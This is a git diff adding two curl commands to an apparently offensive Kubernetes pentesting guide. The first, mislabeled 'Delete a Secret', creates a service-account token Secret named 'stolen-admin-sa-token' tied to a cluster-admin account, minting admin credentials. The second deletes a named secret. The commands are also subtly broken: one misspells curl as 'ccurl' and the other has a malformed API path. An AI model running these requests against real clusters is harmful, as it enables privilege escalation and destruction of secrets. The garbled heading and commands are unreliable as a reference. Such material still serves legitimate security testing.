diff --git a/src/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md b/src/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md
index 56f8192d89..bb400387f6 100644
--- a/src/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md
@@ -801,6 +801,46 @@ curl --path-as-is -i -s -k -X $'DELETE' \
     "https://$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/namespaces/$NAMESPACE/rolebindings/$ROLE_BINDING_NAME"
 ```
 
+### Delete a Secret
+
+```bash
+CONTROL_PLANE_HOST=""
+TOKEN=""
+NAMESPACE="default"
+
+curl --path-as-is -i -s -k -X $'POST' \
+    -H "Host: $CONTROL_PLANE_HOST" \
+    -H "Authorization: Bearer $TOKEN" \
+    -H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
+    -H $'Accept: application/json' \
+    -H $'Content-Type: application/json' \
+    -H $'Content-Length: 219' \
+    -H $'Accept-Encoding: gzip, deflate, br' \
+    --data-binary $'{\"apiVersion\":\"v1\",\"kind\":\"Secret\",\"metadata\":{\"annotations\":{\"kubernetes.io/service-account.name\":\"cluster-admin-sa\"},\"name\":\"stolen-admin-sa-token\",\"namespace\":\"default\"},\"type\":\"kubernetes.io/service-account-token\"}\x0a' \
+    "https://$CONTROL_PLANE_HOST/api/v1/$NAMESPACE/default/secrets?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
+```
+
+### Delete a Secret
+
+```bash
+CONTROL_PLANE_HOST=""
+TOKEN=""
+NAMESPACE="default"
+SECRET_NAME=""
+
+ccurl --path-as-is -i -s -k -X $'DELETE' \
+   -H "Host: $CONTROL_PLANE_HOST" \
+   -H "Authorization: Bearer $TOKEN" \
+   -H $'Content-Type: application/json' \
+   -H $'Accept: application/json' \
+   -H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
+   -H $'Content-Length: 35' \
+   -H $'Accept-Encoding: gzip, deflate, br' \
+   --data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
+   "https://$CONTROL_PLANE_HOST/api/v1/namespaces/$NAMESPACE/secrets/$SECRET_NAME"
+```
+
+
 
 ## References